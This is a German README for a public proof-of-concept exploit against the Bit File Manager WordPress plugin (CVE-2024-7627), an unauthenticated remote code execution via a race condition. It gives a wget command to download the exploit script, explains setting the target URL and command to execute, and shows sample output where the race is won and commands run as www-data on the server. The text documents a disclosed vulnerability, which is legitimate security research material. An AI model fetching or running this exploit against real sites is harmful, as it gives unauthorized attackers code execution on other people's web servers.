
Proof-of-Concept-Skript für das WordPress-Plugin Bit File Manager Version 6.0 - 6.5.5: Unauthentifizierte Remote-Codeausführung durch Race Condition (CVE-2024-7627)
Dieses Proof-of-Concept (PoC)-Skript ist für die Schwachstelle des WordPress-Plugins Bit File Manager Version 6.0 - 6.5.5 Unauthenticated Remote Code Execution via Race Condition (CVE-2024-7627).
Beschreibung:
Das Bit File Manager Plugin für WordPress ist in den Versionen 6.0 bis 6.5.5 anfällig für Remote Code Execution über die 'checkSyntax'-Funktion. Dies liegt daran, dass eine temporäre Datei in ein öffentlich zugängliches Verzeichnis geschrieben wird, bevor die Datei validiert wird. Dies ermöglicht es nicht authentifizierten Angreifern, Code auf dem Server auszuführen, wenn ein Administrator Gastnutzer-Leseberechtigungen erteilt hat. (Von https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-manager/bit-file-manager-60-655-unauthenticated-remote-code-execution-via-race-condition)
wget https://raw.githubusercontent.com/siunam321/CVE-2024-7627-PoC/main/poc.py
file-manager muss bereits vom Administrator eingerichtet seinAktualisieren Sie im Python-Skript poc.py die Werte targetBaseUrl, fileManagerPostPath und/oder commandToExecute auf Ihre gewünschten Werte. Führen Sie dann python3 poc.py aus, um das PoC-Skript auszuführen.
Beispielausgabe:
└> python3 poc.py
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: f3128b289e
[*] Getting a random file's hash via elFinder command "open"...
[+] Found file "wp-config-sample.php" with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA"!
[*] Editing file with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA" via elFinder command "put" and getting the edited temporary PHP file at "http://localhost/wp-content/uploads/file-managertemp.php"...
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[+] We won the race condition! Here's the PHP payload result:
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
8d3b2776e8a6